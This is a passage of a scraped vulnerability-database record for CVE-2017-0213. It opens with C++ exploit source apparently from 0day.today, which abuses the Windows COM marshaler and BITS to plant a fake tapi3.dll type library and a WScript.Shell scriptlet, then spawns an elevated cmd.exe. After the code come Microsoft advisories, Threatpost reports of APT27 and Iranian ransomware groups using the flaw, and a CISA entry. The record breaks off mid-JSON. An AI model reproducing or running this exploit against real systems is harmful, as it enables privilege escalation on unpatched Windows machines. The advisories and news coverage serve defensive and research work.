TestBits()\r\n{\r\n IBackgroundCopyManagerPtr pQueueMgr;\r\n \r\n Check(CoCreateInstance(__uuidof(BackgroundCopyManager), NULL,\r\n CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&pQueueMgr)));\r\n \r\n IUnknownPtr pOuter = new CMarshaller(static_cast<IPersist*>(new FakeObject()));\r\n IUnknownPtr pInner;\r\n \r\n Check(CoGetStdMarshalEx(pOuter, SMEXF_SERVER, &pInner));\r\n \r\n IBackgroundCopyJobPtr pJob;\r\n GUID guidJob;\r\n Check(pQueueMgr->CreateJob(L\"BitsAuthSample\",\r\n BG_JOB_TYPE_DOWNLOAD,\r\n &guidJob,\r\n &pJob));\r\n \r\n IUnknownPtr pNotify;\r\n pNotify.Attach(new CMarshaller(pInner));\r\n {\r\n ScopedHandle link = CreateSymlink(L\"\\\\??\\\\C:\", GetCurrentPath());\r\n printf(\"Result: %08X\\n\", pJob->SetNotifyInterface(pNotify));\r\n }\r\n if (pJob)\r\n {\r\n pJob->Cancel();\r\n }\r\n printf(\"Done\\n\");\r\n}\r\n \r\nclass CoInit\r\n{\r\npublic:\r\n CoInit()\r\n {\r\n Check(CoInitialize(nullptr));\r\n Check(CoInitializeSecurity(nullptr, -1, nullptr, nullptr,\r\n RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, nullptr, EOAC_NO_CUSTOM_MARSHAL | EOAC_DYNAMIC_CLOAKING, nullptr));\r\n }\r\n \r\n ~CoInit()\r\n {\r\n CoUninitialize();\r\n }\r\n};\r\n \r\n// {D487789C-32A3-4E22-B46A-C4C4C1C2D3E0}\r\nstatic const GUID IID_BaseInterface =\r\n{ 0xd487789c, 0x32a3, 0x4e22,{ 0xb4, 0x6a, 0xc4, 0xc4, 0xc1, 0xc2, 0xd3, 0xe0 } };\r\n \r\n// {6C6C9F33-AE88-4EC2-BE2D-449A0FFF8C02}\r\nstatic const GUID TypeLib_BaseInterface =\r\n{ 0x6c6c9f33, 0xae88, 0x4ec2,{ 0xbe, 0x2d, 0x44, 0x9a, 0xf, 0xff, 0x8c, 0x2 } };\r\n \r\nGUID TypeLib_Tapi3 = { 0x21d6d480,0xa88b,0x11d0,{ 0x83,0xdd,0x00,0xaa,0x00,0x3c,0xca,0xbd } };\r\n \r\nvoid Create(bstr_t filename, bstr_t if_name, REFGUID typelib_guid, REFGUID iid, ITypeLib* ref_typelib, REFGUID ref_iid)\r\n{\r\n DeleteFile(filename);\r\n ICreateTypeLib2Ptr tlb;\r\n Check(CreateTypeLib2(SYS_WIN32, filename, &tlb));\r\n tlb->SetGuid(typelib_guid);\r\n \r\n ITypeInfoPtr ref_type_info;\r\n Check(ref_typelib->GetTypeInfoOfGuid(ref_iid, 
&ref_type_info));\r\n \r\n ICreateTypeInfoPtr create_info;\r\n Check(tlb->CreateTypeInfo(if_name, TKIND_INTERFACE, &create_info));\r\n Check(create_info->SetTypeFlags(TYPEFLAG_FDUAL | TYPEFLAG_FOLEAUTOMATION));\r\n HREFTYPE ref_type;\r\n Check(create_info->AddRefTypeInfo(ref_type_info, &ref_type));\r\n Check(create_info->AddImplType(0, ref_type));\r\n Check(create_info->SetGuid(iid));\r\n Check(tlb->SaveAllChanges());\r\n}\r\n \r\nstd::vector<BYTE> ReadFile(bstr_t path)\r\n{\r\n ScopedHandle hFile;\r\n hFile.set(CreateFile(path, GENERIC_READ, 0, nullptr, OPEN_EXISTING, 0, nullptr));\r\n if (hFile.invalid())\r\n {\r\n throw _com_error(E_FAIL);\r\n } \r\n DWORD size = GetFileSize(hFile.get(), nullptr);\r\n std::vector<BYTE> ret(size);\r\n if (size > 0)\r\n {\r\n DWORD bytes_read;\r\n if (!ReadFile(hFile.get(), ret.data(), size, &bytes_read, nullptr) || bytes_read != size)\r\n {\r\n throw _com_error(E_FAIL);\r\n }\r\n }\r\n \r\n return ret;\r\n}\r\n \r\nvoid WriteFile(bstr_t path, const std::vector<BYTE> data)\r\n{\r\n ScopedHandle hFile;\r\n hFile.set(CreateFile(path, GENERIC_WRITE, 0, nullptr, CREATE_ALWAYS, 0, nullptr));\r\n if (hFile.invalid())\r\n {\r\n throw _com_error(E_FAIL);\r\n }\r\n \r\n if (data.size() > 0)\r\n {\r\n DWORD bytes_written;\r\n if (!WriteFile(hFile.get(), data.data(), data.size(), &bytes_written, nullptr) || bytes_written != data.size())\r\n {\r\n throw _com_error(E_FAIL);\r\n }\r\n }\r\n}\r\n \r\nvoid WriteFile(bstr_t path, const char* data)\r\n{\r\n const BYTE* bytes = reinterpret_cast<const BYTE*>(data);\r\n std::vector<BYTE> data_buf(bytes, bytes + strlen(data));\r\n WriteFile(path, data_buf);\r\n}\r\n \r\nvoid BuildTypeLibs(LPCSTR script_path)\r\n{\r\n ITypeLibPtr stdole2;\r\n Check(LoadTypeLib(L\"stdole2.tlb\", &stdole2));\r\n \r\n printf(\"Building Library with path: %s\\n\", script_path);\r\n unsigned int len = strlen(script_path);\r\n \r\n bstr_t buf = GetExeDir() + L\"\\\\\";\r\n for (unsigned int i = 0; i < len; ++i)\r\n {\r\n buf 
+= L\"A\";\r\n }\r\n \r\n Create(buf, \"IBadger\", TypeLib_BaseInterface, IID_BaseInterface, stdole2, IID_IDispatch);\r\n ITypeLibPtr abc;\r\n Check(LoadTypeLib(buf, &abc));\r\n \r\n \r\n bstr_t built_tlb = GetExeDir() + L\"\\\\output.tlb\";\r\n Create(built_tlb, \"ITMediaControl\", TypeLib_Tapi3, IID_ITMediaControl, abc, IID_BaseInterface);\r\n \r\n std::vector<BYTE> tlb_data = ReadFile(built_tlb);\r\n for (size_t i = 0; i < tlb_data.size() - len; ++i)\r\n {\r\n bool found = true;\r\n for (unsigned int j = 0; j < len; j++)\r\n {\r\n if (tlb_data[i + j] != 'A')\r\n {\r\n found = false;\r\n }\r\n }\r\n \r\n if (found)\r\n {\r\n printf(\"Found TLB name at offset %zu\\n\", i);\r\n memcpy(&tlb_data[i], script_path, len);\r\n break;\r\n }\r\n }\r\n \r\n CreateDirectory(GetExeDir() + L\"\\\\Windows\", nullptr);\r\n CreateDirectory(GetExeDir() + L\"\\\\Windows\\\\System32\", nullptr);\r\n \r\n bstr_t target_tlb = GetExeDir() + L\"\\\\Windows\\\\system32\\\\tapi3.dll\";\r\n WriteFile(target_tlb, tlb_data);\r\n}\r\n \r\nconst wchar_t x[] = L\"ABC\";\r\n \r\nconst wchar_t scriptlet_start[] = L\"<?xml version='1.0'?>\\r\\n<package>\\r\\n<component id='giffile'>\\r\\n\"\r\n\"<registration description='Dummy' progid='giffile' version='1.00' remotable='True'>\\r\\n\"\\\r\n\"</registration>\\r\\n\"\\\r\n\"<script language='JScript'>\\r\\n\"\\\r\n\"<![CDATA[\\r\\n\"\\\r\n\" new ActiveXObject('Wscript.Shell').exec('\";\r\n \r\nconst wchar_t scriptlet_end[] = L\"');\\r\\n\"\\\r\n\"]]>\\r\\n\"\\\r\n\"</script>\\r\\n\"\\\r\n\"</component>\\r\\n\"\\\r\n\"</package>\\r\\n\";\r\n \r\nbstr_t CreateScriptletFile()\r\n{\r\n bstr_t script_file = GetExeDir() + L\"\\\\run.sct\";\r\n bstr_t script_data = scriptlet_start;\r\n bstr_t exe_file = GetExe();\r\n wchar_t* p = exe_file;\r\n while (*p)\r\n {\r\n if (*p == '\\\\')\r\n {\r\n *p = '/';\r\n }\r\n p++;\r\n }\r\n \r\n DWORD session_id;\r\n ProcessIdToSessionId(GetCurrentProcessId(), &session_id);\r\n WCHAR session_str[16];\r\n 
StringCchPrintf(session_str, _countof(session_str), L\"%d\", session_id);\r\n \r\n script_data += L\"\\\"\" + exe_file + L\"\\\" \" + session_str + scriptlet_end;\r\n \r\n WriteFile(script_file, script_data);\r\n \r\n return script_file;\r\n}\r\n \r\nvoid CreateNewProcess(const wchar_t* session)\r\n{\r\n DWORD session_id = wcstoul(session, nullptr, 0);\r\n ScopedHandle token;\r\n if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, token.ptr()))\r\n {\r\n throw _com_error(E_FAIL);\r\n }\r\n \r\n ScopedHandle new_token;\r\n \r\n if (!DuplicateTokenEx(token.get(), TOKEN_ALL_ACCESS, nullptr, SecurityAnonymous, TokenPrimary, new_token.ptr()))\r\n {\r\n throw _com_error(E_FAIL);\r\n }\r\n \r\n SetTokenInformation(new_token.get(), TokenSessionId, &session_id, sizeof(session_id));\r\n \r\n STARTUPINFO start_info = {};\r\n start_info.cb = sizeof(start_info);\r\n start_info.lpDesktop = L\"WinSta0\\\\Default\";\r\n PROCESS_INFORMATION proc_info;\r\n WCHAR cmdline[] = L\"cmd.exe\";\r\n if (CreateProcessAsUser(new_token.get(), nullptr, cmdline,\r\n nullptr, nullptr, FALSE, CREATE_NEW_CONSOLE, nullptr, nullptr, &start_info, &proc_info))\r\n {\r\n CloseHandle(proc_info.hProcess);\r\n CloseHandle(proc_info.hThread);\r\n }\r\n}\r\n \r\nint wmain(int argc, wchar_t** argv)\r\n{\r\n try\r\n {\r\n CoInit ci;\r\n if (argc > 1)\r\n {\r\n CreateNewProcess(argv[1]);\r\n }\r\n else\r\n {\r\n bstr_t script = L\"script:\" + CreateScriptletFile();\r\n BuildTypeLibs(script);\r\n TestBits();\r\n }\r\n }\r\n catch (const _com_error& err)\r\n {\r\n printf(\"Error: %ls\\n\", err.ErrorMessage());\r\n }\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-02-21] #", "sourceHref": "https://0day.today/exploit/27798", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "mscve": [{"lastseen": "2021-12-06T18:25:23", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n\nTo exploit this 
vulnerability, an authenticated attacker could run a specially crafted application. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel initializes objects in memory.\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-05-09T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0258"], "modified": "2017-05-11T07:00:00", "id": "MS:CVE-2017-0258", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0258", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:23", "description": "An elevation of privilege vulnerability exists when Windows fails to properly validate input before loading type libraries. 
An attacker could use this vulnerability to elevate their privilege level.\n\nTo exploit this vulnerability an attacker would first need to have access to the local system and have the ability to execute a malicious application.\n\nThe update corrects how Windows validates permissions when loading type libraries.\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T07:00:00", "type": "mscve", "title": "Windows COM Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0214"], "modified": "2017-05-11T07:00:00", "id": "MS:CVE-2017-0214", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0214", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:25:23", "description": "An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. 
On systems with Windows 7 for x64-based Systems or later installed, this vulnerability can lead to denial of service.\n\nTo exploit the vulnerability, an attacker would have to either log on locally to an affected system, or convince a locally authenticated user to execute a specially crafted application.\n\nThe security update addresses the vulnerability by ensuring the Windows Kernel properly handles objects in memory.\n", "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T07:00:00", "type": "mscve", "title": "Windows Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0244"], "modified": "2017-05-11T07:00:00", "id": "MS:CVE-2017-0244", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0244", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:23", "description": "An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler. 
An attacker who successfully exploited the vulnerability could run arbitrary code with elevated privileges.\n\nTo exploit the vulnerability, an attacker could run a specially crafted application that could exploit the vulnerability. This vulnerability by itself does not allow arbitrary code to be run. However, this vulnerability could be used in conjunction with one or more vulnerabilities (e.g. a remote code execution vulnerability and another elevation of privilege) that could take advantage of the elevated privileges when running.\n\nThe update addresses the vulnerability by correcting how Windows COM Marshaler processes interface requests.\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-05-09T07:00:00", "type": "mscve", "title": "Windows COM Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213"], "modified": "2017-09-12T07:00:00", "id": "MS:CVE-2017-0213", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0213", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}}], "threatpost": [{"lastseen": "2020-08-24T21:45:54", "description": "A 
group of \u2018script kiddies\u2019 tied to Iran are targeting companies worldwide with internet-facing Remote Desktop Protocol (RDP) ports and weak credentials in order to infect them with Dharma ransomware.\n\nThe [Dharma malware](<https://threatpost.com/keys-for-dharma-ransomware-released/124024/>) (also known as Crysis) [has been distributed](<https://threatpost.com/next-gen-ransomware-packs-a-human-punch-microsoft-warns/153501/>) as a ransomware-as-a-service (RaaS) model since at least 2016. While the ransomware was previously used by advanced persistent threat (APT) actors, its source code surfaced in March 2020, making it available to a wider range of attackers. That is the case with this latest Iran-linked threat group, which researchers say is unsophisticated and has been targeting companies across Russia, Japan, China and India with the ransomware since June.\n\n\u201cThe fact Dharma source code has been made widely available led to the increase in the number of operators deploying it,\u201d Oleg Skulkin, senior digital forensics specialist with Group-IB, said [in an analysis](<https://www.group-ib.com/media/iran-cybercriminals/>) of the attacks posted Monday. \u201cIt\u2019s surprising that Dharma landed in the hands of Iranian script kiddies who used it for financial gain, as Iran has traditionally been a land of state-sponsored attackers engaged in espionage and sabotage. 
Despite the fact that these cybercriminals use quite common tactics, techniques and procedures, they have been quite effective.\u201d\n\nThe threat actors are unsophisticated because they use publicly available tools both to obtain initial access and move laterally \u2013 rather than using custom malware or post-exploitation frameworks, Group-IB senior DFIR analyst Oleg Skulkin told Threatpost.\n\n\u201cThe threat actors use Persian language for Google searches on compromised servers and download tools from Iran-linked Telegram groups,\u201d Skulkin told Threatpost. \u201cIn addition, Group-IB experts saw the threat actors\u2019 attempt to brute-force accounts on an Iranian video streaming service.\u201d\n\nThe attackers in this campaign would first scan ranges of IPs for hosts that exposed RDP ports and used weak credentials, researchers said. They did so using the scanning software Masscan (which has previously been utilized by [bad actors like Fxmsp](<https://threatpost.com/notorious-hacker-fxmsp-outed/157275/>)).\n\nOnce vulnerable hosts were identified, the attackers deployed [a well-known RDP](<https://www.wilbursecurity.com/2019/10/rdp-honeypotting/>) brute force application called NLBrute, which has been sold on forums for years. Using this tool, they were able to brute-force their way into the system, and then check the validity of the obtained credentials on other accessible hosts in the network.\n\nIn some attacks, the attackers also attempted to elevate privileges using an exploit for an elevation-of-privilege flaw. This medium-severity flaw ([CVE-2017-0213](<https://nvd.nist.gov/vuln/detail/CVE-2017-0213>)), which affects Windows systems, is local: it can be exploited when an attacker who already has access to the host runs a specially crafted application.\n\nPost compromise, \u201cinterestingly, the threat actors likely didn\u2019t have a clear plan on what to do with the compromised networks,\u201d said researchers, showing their lack of sophistication. 
In different attacks, attackers would download various publicly available tools to perform reconnaissance or move laterally across the network.\n\nTo scan for accessible hosts in the compromised network, for instance, they used the publicly available tool Advanced Port Scanner. Other tools were downloaded by the attackers from Persian-language Telegram channels, researchers said.\n\n\u201cFor instance, to disable built-in antivirus software, the attackers used Defender Control and Your Uninstaller,\u201d said researchers. \u201cThe latter was downloaded from an Iranian software sharing website \u2014 the Google search query in Persian language \u201c\u062f\u0627\u0646\u0644\u0648\u062f \u0646\u0631\u0645 \u0627\u0641\u0632\u0627\u0631 youre unistaller\u201d was discovered in the Chrome artifacts.\u201d\n\nAttackers would then move laterally across the network and deploy the Dharma variant executable, encrypt data, and leave a ransom note for the victim. Researchers said hackers typically demanded a ransom of between 1 and 5 BTC (worth between 12,000 and 59,000 USD at the time of writing).\n\nResearchers said that, though the exact number of victims in this campaign is unknown, the discovered forensic artifacts revealed that the threat actors in this campaign are \u201cfar behind the level of sophistication of big league Iranian APTs.\u201d\n\n\u201cThe newly discovered hacker group suggests that Iran, which has been known as a cradle of state-sponsored APT groups for years, now also accommodates financially motivated cybercriminals,\u201d according to Group-IB researchers.\n\nResearchers said part of this change may be attributed to the pandemic exposing a number of vulnerable hosts \u2013 with many employees working remotely \u2013 making RDP an extremely popular attack vector for cybercriminals. 
Therefore, the default RDP port 3389 should be closed if not in use, they suggested.\n\n\u201cAs the attackers usually need several attempts to brute force passwords and gain access to the RDP, it is important to enable account lockout policies by limiting the number of failed login attempts per user,\u201d said researchers.\n", "cvss3": {}, "published": "2020-08-24T15:23:37", "type": "threatpost", "title": "Iran-Linked 'Newbie' Hackers Spread Dharma Ransomware Via RDP Ports", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0213"], "modified": "2020-08-24T15:23:37", "id": "THREATPOST:22AA852BEEA43B18D4341D7ADA922536", "href": "https://threatpost.com/iran-linked-newbie-hackers-spread-dharma-ransomware-via-rdp-ports/158580/", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-06T21:58:42", "description": "A recent slew of related ransomware attacks on top videogame companies has been associated with the notorious Chinese-linked APT27 threat group, suggesting that the advanced persistent threat (APT) is swapping its historically espionage-centric tactics to adopt ransomware, a new report says.\n\nResearchers noticed the \u201cstrong links\u201d to APT27 when they were brought in as part of incident response for ransomware activity that affected several major gaming companies globally last year as part of a supply-chain attack. Details of these incidents (including specific company names and the timeline) are scant. However, while researchers told Threatpost that they could not name the specific gaming companies attacked, they said that five companies were affected. What\u2019s more, two of the affected companies are \u201camong the largest in the world,\u201d they said.\n\nAPT27 (also known as Bronze Union, LuckyMouse, and Emissary Panda), [is believed to operate from the People\u2019s Republic of China](<https://threatpost.com/bronze-union-apt-updates-remote-access-trojans-in-fresh-wave-of-attacks/142219/>) and has been around since 2013, researchers said. 
The group has historically leveraged publicly available tools to access networks with an aim of collecting political and military intelligence. And, it\u2019s previously been focused on cyberespionage and data theft, rather than monetary profit.\n\n\u201cPreviously, APT27 was not necessarily focused on financial gain, and so employing ransomware-actor tactics is highly unusual. However, this incident occurred at a time where COVID-19 was rampant across China, with lockdowns being put into place, and therefore a switch to a financial focus would not be surprising,\u201d according to researchers with Profero and Security Joes, [in a joint Monday analysis](<https://shared-public-reports.s3-eu-west-1.amazonaws.com/APT27+turns+to+ransomware.pdf>) [PDF].\n\n## **The Supply-Chain Attack**\n\nThe initial infection vector for the attack was through a third-party service provider that had been previously infected through another third-party service provider, researchers said.\n\nUpon further investigation into the security incident, researchers discovered malware samples linked to a campaign from the beginning of 2020, [called DRBControl](<https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia>). Trend Micro researchers who previously discovered this campaign noted that it had links to APT27 and the [Winnti supply-chain specialist gang](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>). 
The hallmarks of the DRBControl backdoor attack were that it hit gambling companies, and used Dropbox for command-and-control (C2) communications.\n\nProfero and Security Joes researchers discovered a \u201cvery similar sample\u201d of DRBControl in the more recent campaign (which they dubbed the \u201cClambling\u201d sample) \u2013 though this variant lacked the Dropbox capabilities.\n\nResearchers found that DRBControl \u2013 as well as a PlugX sample \u2013 was then loaded into memory using a Google Updater executable, which was vulnerable to DLL side-loading (side-loading places a malicious DLL where a legitimate, signed executable will load it in place of the genuine library, so the trusted process ends up executing the attacker\u2019s code). Both samples used the signed Google Updater, and both DLLs were labeled goopdate.dll, researchers said.\n\n\u201cFor each of the two samples, there was a legitimate executable, a malicious DLL and a binary file consisting of shellcode responsible for extracting the payload from itself and running it in memory,\u201d said researchers.\n\nAfter the threat actors gained a foothold on the company systems through the third-party compromise, an ASPXSpy webshell was deployed to assist in lateral movement.\n\nAnother process that stood out in this incident was the encryption of core servers using BitLocker, which is a drive encryption tool built into Windows, said researchers.\n\n\u201cThis was particularly interesting, as in many cases threat actors will drop ransomware to the machines, rather than use local tools,\u201d they said.\n\n## **APT27 Clues**\n\nResearchers observed \u201cextremely strong links\u201d to APT27 in terms of code similarities, and tactics, techniques and procedures (TTPs).\n\nResearchers for instance said that they found similarities between the DRBControl sample and older confirmed APT27 implants. In addition, a modified version of the ASPXSpy webshell used in the campaign was previously seen in APT27-attributed cyberattacks. 
And, alongside the discovered backdoor, researchers also found a binary responsible for escalating privileges by exploiting CVE-2017-0213, a [Microsoft Windows vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2017-0213>) that APT27 has used before.\n\n\u201cAPT27 has been known to use this exploit to escalate privileges in the past; with one incident resulting in a cryptominer being dropped to the system,\u201d said researchers.\n\nBeyond the arsenal of tools matching up to previous APT27 operations, researchers noted code similarities with previous APT27 campaigns; and the domains used in this operation were matched to other operations previously linked to APT27, Omri Segev Moyal, CEO of Profero, told Threatpost.\n\nResearchers also pointed to similarities in various processes used within the attack that link back to previous APT27 attacks, including the group\u2019s method of using the number of arguments to execute different functions, and the usage of DLL side-loading with the main payload stored in a separate file.\n", "cvss3": {}, "published": "2021-01-05T15:26:12", "type": "threatpost", "title": "Major Gaming Companies Hit with Ransomware Linked to APT27", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0213"], "modified": "2021-01-05T15:26:12", "id": "THREATPOST:3649750E149C0B00551806E47C047B39", "href": "https://threatpost.com/ransomware-major-gaming-companies-apt27/162735/", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Microsoft Windows COM Aggregate Marshaler allows for privilege escalation when an attacker runs a specially crafted application.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-28T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213"], "modified": "2022-03-28T00:00:00", "id": "CISA-KEV-CVE-2017-0213", "href": "", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}}], "myhack58": [{"lastseen": "2017-06-08T06:18:38", "edition": 2, "description": "CVE-2017-0213, Windows COM elevation of privilege vulnerability. First, a look at the vulnerability itself:\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0213>\n\nThe implementation of the Windows COM Aggregate Marshaler contains a privilege escalation vulnerability that allows a local attacker to elevate privileges and execute arbitrary code.\n\nIn plain terms: a COM component can be abused to gain elevated privileges.\n\nMicrosoft's official description:\n\nAn elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler. An attacker who successfully exploited the vulnerability could run arbitrary code with higher privileges. In order to exploit the vulnerability, an attacker could run a specially crafted application that could exploit the vulnerability. This vulnerability by itself does not allow arbitrary code to run. 
However, this vulnerability could be used in conjunction with one or more other vulnerabilities (for example a remote code execution vulnerability and another elevation of privilege) to run code with elevated privileges.\n\nThe affected versions are as follows:\n\nProduct | Version | Update | Tested \n---|---|---|--- \nWindows 10 | | | \u221a \nWindows 10 | 1511 | | \nWindows 10 | 1607 | | \nWindows 10 | 1703 | | \u221a \nWindows 7 | | SP1 | \u221a \nWindows 8.1 | | | \nWindows RT 8.1 | | | \nWindows Server 2008 | | SP2 | \nWindows Server 2008 | R2 | SP1 | \nWindows Server 2012 | | | \nWindows Server 2012 | R2 | | \nWindows Server 2016 | | | \n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-06-08T00:00:00", "title": "CVE-2017-0213 Windows COM elevation of privilege vulnerability-vulnerability warning-the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": 